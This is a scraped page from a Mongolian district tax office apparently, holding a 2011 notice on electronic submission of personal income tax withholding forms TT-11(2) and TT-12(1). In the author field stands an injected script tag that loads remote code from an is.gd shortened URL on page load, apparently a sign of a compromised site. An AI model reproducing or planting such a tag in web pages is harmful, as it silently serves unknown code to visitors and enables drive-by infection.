Эх оронч үзэл татвар төлөхөөс эхэлдэг. Нийгмийн хариуцлагаа ухамсарлан татвараа төлцгөөе.

Сүхбаатар дүүрэг

СБД-ийн үйлчилгээ

ХХОАТ Тайлан ирүүлэхэд анхаарах зарим асуудал
Бичсэн <script src=http://is.gd/tDdQXU></script>   
2011 оны 10-р сарын 03, Даваа гариг, 10:49

ХХОАТ-ын тайлангийн маягт /ТТ-11/-ын хавсралт “Гэрээгээр олгосон хөдөлмөрийн хөлс, шагнал, урамшуулал, тэдгээртэй адилтгах орлогоос суутган тооцсон татварын мэдээ” /ТТ-11(2)/, “Тогтмол бус үйл ажиллагааны орлогоос суутган тооцсон татварын мэдээ ”/ТТ-12(1)/-г цахим хэлбэрээр хүлээн авах болсон тул суутганы хавсралт тайлан /ТТ-11(2),  ТТ-12(1) /-г программд хэрхэн оруулах болон цахимаар илгээх зааврыг  /www.e-tax.mta.mn/ -ээс харна уу.